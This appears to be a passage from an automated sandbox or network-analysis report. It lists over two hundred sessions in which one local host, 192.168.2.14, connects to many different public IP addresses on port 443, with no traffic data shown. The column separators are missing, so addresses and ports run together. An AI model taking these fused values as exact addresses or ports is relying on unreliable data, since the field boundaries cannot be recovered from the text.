                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15305192.168.2.1433734105.139.193.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15306192.168.2.145562059.18.87.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15307192.168.2.1434252207.217.227.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15308192.168.2.1458922122.94.96.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15309192.168.2.1457802156.12.111.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15310192.168.2.143689260.241.13.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15311192.168.2.145628644.251.134.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15312192.168.2.145580646.216.240.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15313192.168.2.1453594219.207.206.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15314192.168.2.144066847.194.222.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15315192.168.2.1454680187.229.82.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15316192.168.2.1453012187.214.32.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15317192.168.2.1447376142.41.223.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15318192.168.2.1447468118.8.65.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15319192.168.2.1448414143.219.203.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15320192.168.2.144305871.241.181.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15321192.168.2.1459926171.178.194.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15322192.168.2.1442820210.187.207.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15323192.168.2.144033099.38.191.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15324192.168.2.144671861.162.212.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15325192.168.2.143888085.230.11.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15326192.168.2.1442364120.217.250.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15327192.168.2.1449354153.121.17.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15328192.168.2.1454172139.8.2.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15329192.168.2.1453834111.182.175.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15330192.168.2.145725895.52.12.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15331192.168.2.144871069.34.138.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15332192.168.2.143301254.112.117.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15333192.168.2.145936050.147.58.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15334192.168.2.145619059.66.237.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15335192.168.2.143446427.37.228.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15336192.168.2.1444354128.236.64.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15337192.168.2.1441628158.255.119.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15338192.168.2.145555048.77.148.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15339192.168.2.145154690.36.202.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15340192.168.2.144974474.192.29.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15341192.168.2.1449432154.179.197.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15342192.168.2.14444784.33.140.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15343192.168.2.145438279.160.216.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15344192.168.2.1452206194.190.206.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15345192.168.2.1456962206.132.250.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15346192.168.2.143524034.107.79.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15347192.168.2.1444292174.107.159.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15348192.168.2.144728079.5.22.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15349192.168.2.1449414220.76.22.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15350192.168.2.1434620179.104.153.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15351192.168.2.143948077.202.118.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15352192.168.2.1436636173.5.53.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15353192.168.2.144028490.46.63.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15354192.168.2.1443896194.11.130.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15355192.168.2.146055464.216.235.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15356192.168.2.143973642.210.116.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15357192.168.2.143695043.184.186.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15358192.168.2.1443388166.83.232.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15359192.168.2.146027892.70.244.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15360192.168.2.143449440.155.21.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15361192.168.2.144137420.195.207.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15362192.168.2.1455388139.243.165.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15363192.168.2.1442960130.26.87.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15364192.168.2.144133434.241.83.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15365192.168.2.143491078.213.214.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15366192.168.2.143622291.32.151.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15367192.168.2.145757495.165.162.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15368192.168.2.145839693.182.3.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15369192.168.2.1454006136.72.72.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15370192.168.2.1445888174.72.166.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15371192.168.2.1457442135.199.193.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15372192.168.2.14395304.211.108.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15373192.168.2.1433080125.156.213.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15374192.168.2.1444654181.41.247.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15375192.168.2.1460814160.219.194.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15376192.168.2.1440770119.244.247.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15377192.168.2.143508653.226.4.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15378192.168.2.1453960107.216.183.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15379192.168.2.145882679.137.90.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15380192.168.2.144803684.46.178.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15381192.168.2.1443192118.62.75.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15382192.168.2.1452858107.25.211.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15383192.168.2.145758223.9.103.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15384192.168.2.1460574108.28.14.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15385192.168.2.144642641.109.147.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15386192.168.2.1450238209.231.66.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15387192.168.2.1436454203.254.117.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15388192.168.2.1439236198.193.225.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15389192.168.2.1458736132.254.197.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15390192.168.2.146004641.208.134.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15391192.168.2.144192053.144.158.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15392192.168.2.1456316202.205.48.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15393192.168.2.1447886163.168.52.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15394192.168.2.1447962206.92.38.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15395192.168.2.1456034189.92.109.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15396192.168.2.143626286.249.2.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15397192.168.2.1439872221.160.45.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15398192.168.2.1440256115.85.129.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15399192.168.2.1456792174.203.176.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15400192.168.2.143678435.9.237.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15401192.168.2.1456838106.103.148.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15402192.168.2.1445136196.227.4.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15403192.168.2.1449276206.133.238.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15404192.168.2.144299885.200.230.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15405192.168.2.1443996209.207.112.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15406192.168.2.145149480.177.167.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15407192.168.2.1438696169.14.154.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15408192.168.2.1447312174.105.147.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15409192.168.2.1440542149.168.242.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15410192.168.2.143326250.65.146.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15411192.168.2.1460946167.216.182.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15412192.168.2.144379895.229.88.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15413192.168.2.1450172111.79.36.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15414192.168.2.145747280.128.186.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15415192.168.2.144575858.188.88.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15416192.168.2.1435076174.137.217.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15417192.168.2.1442298192.145.94.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15418192.168.2.144018665.3.65.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15419192.168.2.145096282.209.150.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15420192.168.2.143475840.59.110.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15421192.168.2.1457916180.198.234.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15422192.168.2.144911266.230.181.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15423192.168.2.145143817.212.139.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15424192.168.2.1454170193.180.83.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15425192.168.2.1449478102.128.152.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15426192.168.2.1436104206.159.158.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15427192.168.2.143809666.172.100.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15428192.168.2.1448562175.95.38.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15429192.168.2.1440946110.63.190.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15430192.168.2.1453740167.92.244.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15431192.168.2.1455146198.103.232.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15432192.168.2.1456816156.17.76.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15433192.168.2.1433692181.153.227.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15434192.168.2.1443790114.67.130.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15435192.168.2.1448410133.254.209.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15436192.168.2.145865277.168.111.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15437192.168.2.145273665.172.234.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15438192.168.2.143298460.34.231.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15439192.168.2.1455438176.41.162.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15440192.168.2.1443202139.199.30.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15441192.168.2.1443378211.42.212.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15442192.168.2.1450846202.218.97.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15443192.168.2.1433366156.44.243.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15444192.168.2.143925295.49.91.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15445192.168.2.1449988205.21.17.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15446192.168.2.1440606190.196.112.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15447192.168.2.145307665.5.95.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15448192.168.2.145243834.191.33.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15449192.168.2.144527478.223.114.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15450192.168.2.1446960123.232.212.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15451192.168.2.1450268141.7.130.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15452192.168.2.145532899.142.167.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15453192.168.2.1444808138.208.140.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15454192.168.2.1447366110.154.148.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15455192.168.2.143293612.204.134.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15456192.168.2.1439986159.73.94.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15457192.168.2.1453444186.57.60.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15458192.168.2.145726690.209.94.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15459192.168.2.144434498.170.169.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15460192.168.2.14607602.204.14.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15461192.168.2.1445934210.70.75.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15462192.168.2.1458126191.58.252.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15463192.168.2.1448890222.175.216.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15464192.168.2.143891845.39.1.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15465192.168.2.144819279.225.201.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15466192.168.2.145839465.159.171.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15467192.168.2.1443728173.178.19.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15468192.168.2.1450664212.4.186.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15469192.168.2.1452172146.34.162.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15470192.168.2.1459074161.4.237.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15471192.168.2.1451252124.56.134.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15472192.168.2.1458410117.190.203.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15473192.168.2.143452294.62.105.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15474192.168.2.1459372164.124.34.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15475192.168.2.144455253.0.89.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15476192.168.2.1450998148.86.24.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15477192.168.2.1450586123.151.115.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15478192.168.2.143717845.14.218.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15479192.168.2.1447310157.54.50.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15480192.168.2.1457314158.200.22.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15481192.168.2.1434350123.11.105.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15482192.168.2.1448584128.130.133.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15483192.168.2.1459568132.230.149.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15484192.168.2.1457000194.36.140.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15485192.168.2.145656234.176.77.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15486192.168.2.144035865.163.197.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15487192.168.2.145892265.109.185.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15488192.168.2.1435420173.79.187.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15489192.168.2.145878879.17.150.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15490192.168.2.143549219.161.164.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15491192.168.2.145366414.98.30.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15492192.168.2.144879675.35.117.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15493192.168.2.1451320103.168.185.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15494192.168.2.1459908108.238.91.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15495192.168.2.144952880.255.70.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15496192.168.2.1454862151.58.235.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15497192.168.2.1457304165.49.101.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15498192.168.2.1451760222.170.184.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15499192.168.2.143513490.198.99.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15500192.168.2.145835869.247.235.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15501192.168.2.1445692186.39.55.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15502192.168.2.1436472118.152.172.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15503192.168.2.1451122157.28.87.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15504192.168.2.1445930187.246.115.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15505192.168.2.1457674179.199.180.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15506192.168.2.145486068.192.203.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15507192.168.2.1438360120.26.199.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15508192.168.2.1438350150.82.222.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15509192.168.2.1449492125.176.135.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15510192.168.2.145749432.19.88.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15511192.168.2.1441820192.205.45.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15512192.168.2.1455958166.159.191.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15513192.168.2.1449606202.55.129.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15514192.168.2.1436044154.248.46.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15515192.168.2.143398634.107.230.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15516192.168.2.1455312108.188.132.131443
                                                        TimestampBytes transferredDirectionData


